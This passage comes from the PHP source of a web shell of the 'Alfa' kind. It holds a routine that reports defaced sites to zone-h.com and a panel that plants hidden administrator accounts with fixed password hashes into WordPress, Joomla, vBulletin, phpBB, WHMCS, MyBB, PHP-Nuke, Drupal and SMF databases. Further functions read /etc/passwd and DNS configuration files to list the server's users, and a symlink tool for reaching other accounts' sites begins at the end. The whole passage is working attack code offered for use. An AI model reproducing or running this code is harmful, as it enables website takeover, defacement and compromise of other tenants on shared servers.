4838die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
4839}
4840$i = 0;
4841$sites = explode("\n", $site);
4842$alfa = new AlfaCURL();
4843while($i < count($sites)){
4844if(substr($sites[$i], 0, 4) != "http"){
4845$sites[$i] = "http://".$sites[$i];
4846}
4847$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
4848++$i;
4849}
4850echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
4851}
4852echo "</div>";
4853alfafooter();
4854}
4855function alfapwchanger(){
4856alfahead();
4857
4858echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
4859<center><h3>';
4860$vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
4861Alfa_Create_A_Tag('pwchanger',$vals);
4862echo '</h3></center>';
4863if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){
4864
4865echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
4866<p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
4867$table = array('td1' =>
4868 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4869 'td2' =>
4870 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4871 'td3' =>
4872 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4873 'td4' =>
4874 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4875 'td5' =>
4876 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
4877 'td6' =>
4878 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4879 'td7' =>
4880 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4881 'td8' =>
4882 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4883);
4884create_table($table);
4885echo '<p><input value=" " name="send" type="submit"></p></form>';
4886if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
4887$localhost = $_POST['alfa3'];
4888$database = $_POST['alfa4'];
4889$username = $_POST['alfa5'];
4890$password = $_POST['alfa6'];
4891$admin = $_POST['alfa8'];
4892$SQL = $_POST['alfa9'];
4893$prefix = $_POST['alfa10'];
4894$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4895$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
4896$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
4897$sole = @mysqli_num_rows($solevisible);
4898if ($sole == 1){
4899$solevis = @mysqli_fetch_assoc($solevisible);
4900$res = $solevis['ID'];
4901}
4902$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
4903if($solevisible){
4904__alert('Success... '.$admin.' is created...');}
4905}
4906}
4907if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){
4908
4909echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
4910$table = array('td1' =>
4911 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4912 'td2' =>
4913 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4914 'td3' =>
4915 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4916 'td4' =>
4917 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4918 'td5' =>
4919 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
4920 'td6' =>
4921 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4922 'td7' =>
4923 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4924 'td8' =>
4925 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4926);
4927create_table($table);
4928echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4929if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4930$localhost = $_POST['alfa3'];
4931$database = $_POST['alfa4'];
4932$username = $_POST['alfa5'];
4933$password = $_POST['alfa6'];
4934$admin = $_POST['alfa8'];
4935$SQL = $_POST['alfa9'];
4936$prefix = $_POST['alfa10'];
4937$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4938$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
4939$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
4940$sole =@mysqli_num_rows($solevisible);
4941if ($sole == 1){
4942$solevis =@mysqli_fetch_assoc($solevisible);
4943$res = $solevis['id'];
4944}
4945$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
4946if($solevisible){
4947__alert('Success... '.$admin.' is created...');}
4948}
4949}
4950if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
4951
4952echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
4953$table = array('td1' =>
4954 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4955 'td2' =>
4956 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
4957 'td3' =>
4958 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
4959 'td4' =>
4960 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
4961 'td5' =>
4962 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
4963 'td6' =>
4964 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
4965 'td7' =>
4966 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4967 'td8' =>
4968 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
4969);
4970create_table($table);
4971echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4972if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4973$localhost = $_POST['alfa2'];
4974$database = $_POST['alfa3'];
4975$username = $_POST['alfa5'];
4976$password = $_POST['alfa6'];
4977$prefix = $_POST['alfa7'];
4978$admin = $_POST['alfa8'];
4979$SQL = $_POST['alfa9'];
4980$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4981$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
4982$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
4983$sole = mysqli_num_rows($solevisible);
4984if($sole == 1){
4985$solevis = mysqli_fetch_assoc($solevisible);
4986$res = $solevis['userid'];
4987}
4988$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysqli_error($conn));
4989if($solevisible){
4990__alert('Success... '.$admin.' is created...');}
4991}
4992}
4993if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){
4994
4995echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
4996$table = array('td1' =>
4997 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
4998 'td2' =>
4999 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
5000 'td3' =>
5001 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
5002 'td4' =>
5003 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
5004 'td5' =>
5005 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
5006 'td6' =>
5007 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
5008 'td7' =>
5009 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
5010 'td8' =>
5011 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
5012);
5013create_table($table);
5014echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5015if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
5016$localhost = $_POST['alfa2'];
5017$database = $_POST['alfa3'];
5018$username = $_POST['alfa4'];
5019$password = $_POST['alfa6'];
5020$admin = $_POST['alfa8'];
5021$SQL = $_POST['alfa9'];
5022$prefix = $_POST['alfa10'];
5023$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
5024$hash = md5('solevisible');
5025$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
5026$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
5027$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
5028$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
5029$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
5030if($solevisible){
5031__alert('Success... '.$admin.' is created...');
5032}
5033}
5034}
5035if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){
5036
5037echo __pre().'<center><div class="txtfont_header">| Whmcs |</div><p><p>'.getConfigHtml('whmcs').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,\'whmcs\',null,this.admin.value,this.email.value); return false;" method="POST">';
5038$table = array('td1' =>
5039 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
5040 'td2' =>
5041 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
5042 'td3' =>
5043 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
5044 'td4' =>
5045 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
5046 'td6' =>
5047 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
5048 'td7' =>
5049 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
5050 'td8' =>
5051 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
5052);
5053create_table($table);
5054echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5055if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
5056$localhost = $_POST['alfa2'];
5057$database = $_POST['alfa3'];
5058$username = $_POST['alfa4'];
5059$password = $_POST['alfa5'];
5060$admin = $_POST['alfa8'];
5061$SQL = $_POST['alfa9'];
5062$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
5063$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
5064if($solevisible){
5065__alert('Success... '.$admin.' is created...');}
5066}
5067}
5068if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){
5069
5070echo __pre().'<center><div class="txtfont_header">| Mybb |</div><p><p>'.getConfigHtml('mybb').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,\'mybb\',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
5071$table = array('td1' =>
5072 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
5073 'td2' =>
5074 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
5075 'td3' =>
5076 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
5077 'td4' =>
5078 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
5079 'td5' =>
5080 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
5081 'td6' =>
5082 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
5083 'td7' =>
5084 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
5085 'td8' =>
5086 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
5087);
5088create_table($table);
5089echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5090if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
5091$localhost = $_POST['alfa2'];
5092$database = $_POST['alfa3'];
5093$username = $_POST['alfa4'];
5094$password = $_POST['alfa5'];
5095$admin = $_POST['alfa8'];
5096$SQL = $_POST['alfa9'];
5097$prefix = $_POST['alfa10'];
5098$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
5099$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
5100if($solevisible){
5101__alert('Success... '.$admin.' is created...');}
5102}
5103}
5104if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){
5105
5106echo __pre().'<center><div class="txtfont_header">| PhpNuke |</div><p><p>'.getConfigHtml('phpnuke').'</p><form onsubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'nuke\',this.email.value,this.prefix.value); return false;" method="POST">';
5107$table = array('td1' =>
5108 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
5109 'td2' =>
5110 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
5111 'td3' =>
5112 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
5113 'td4' =>
5114 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
5115 'td5' =>
5116 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
5117 'td6' =>
5118 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
5119 'td7' =>
5120 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
5121 'td8' =>
5122 array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
5123);
5124create_table($table);
5125echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5126if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
5127$localhost = $_POST['alfa2'];
5128$database = $_POST['alfa3'];
5129$username = $_POST['alfa4'];
5130$password = $_POST['alfa5'];
5131$admin = $_POST['alfa7'];
5132$SQL = $_POST['alfa9'];
5133$prefix = $_POST['alfa10'];
5134$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
5135$hash = md5($pwd);
5136$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
5137if($solevisible){
5138__alert('Success... '.$admin.' is created...');}
5139}
5140}
5141if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){
5142
5143echo __pre().'<center><div class="txtfont_header">| Drupal |</div><p><p>'.getConfigHtml('drupal').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,\'drupal\'); return false;" method="POST">';
5144$table = array('td1' =>
5145 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
5146 'td2' =>
5147 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
5148 'td3' =>
5149 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
5150 'td4' =>
5151 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
5152 'td6' =>
5153 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
5154 'td7' =>
5155 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true)
5156 );
5157create_table($table);
5158echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5159if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
5160$localhost = $_POST['alfa2'];
5161$database = $_POST['alfa4'];
5162$username = $_POST['alfa5'];
5163$password = $_POST['alfa6'];
5164$admin = $_POST['alfa8'];
5165$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
5166$getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1");
5167$getDescuid = @mysqli_fetch_assoc($getDescuid);
5168$getDescuid = $getDescuid['uid'];
5169$getdescuid = $getDescuid++;
5170$solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
5171$solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn));
5172$sole = mysqli_num_rows($solevisible);
5173if ($sole == 1){
5174$solevis = mysqli_fetch_assoc($solevisible);
5175$res = $solevis['uid'];
5176}
5177$solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn));
5178if($solevisible){
5179__alert('Success... '.$admin.' is created...');}
5180}
5181}
5182
5183if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){
5184
5185echo __pre().'<center><center><div class="txtfont_header">| SMF |</div><p><p>'.getConfigHtml('smf').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
5186$table = array('td1' =>
5187 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
5188 'td2' =>
5189 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
5190 'td3' =>
5191 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
5192 'td4' =>
5193 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
5194 'td5' =>
5195 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'),
5196 'td6' =>
5197 array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
5198 'td7' =>
5199 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
5200 );
5201create_table($table);
5202echo '<p><input value=" " name="send" type="submit"></p></form></center>';
5203if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
5204$localhost = $_POST['alfa2'];
5205$database = $_POST['alfa3'];
5206$username = $_POST['alfa5'];
5207$password = $_POST['alfa6'];
5208$prefix = $_POST['alfa7'];
5209$admin = $_POST['alfa8'];
5210$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
5211$setpwAlg = sha1(strtolower($admin) . 'solevisible');
5212$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
5213if($solevisible){
5214__alert('Success... '.$admin.' is created...');}
5215}
5216}
5217echo "</div>";
5218alfafooter();
5219}
5220function alfaMakePwd(){
5221 if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
5222 return "/home/{user}/public_html/";
5223 }
5224 $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
5225 $public = end($document);
5226 array_pop($document);
5227 array_pop($document);
5228 $path = implode("/", $document) . "/{user}/" . $public;
5229 return $path;
5230}
5231function alfaGetDomains($state = false){
5232 $state = "named.conf";
5233 $lines = array();
5234 $lines = _alfa_file('/etc/named.conf');
5235 if(!$lines){
5236 $lines = @scandir("/etc/valiases/");
5237 $state = "valiases";
5238 if(!$lines){
5239 $lines = @scandir("/var/named");
5240 $state = "named";
5241 if(!$lines && $state){
5242 $lines = _alfa_file('/etc/passwd');
5243 $state = "passwd";
5244 }
5245 }
5246 }
5247 return array("lines" => $lines, "state" => $state);
5248}
5249function alfasymlink(){
5250alfahead();
5251AlfaNum(9,10);
5252echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
5253if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
5254 $sympath = alfaMakePwd();
5255 @mkdir('cgialfa',0755);
5256 @chdir('cgialfa');
5257 alfacgihtaccess('cgi');
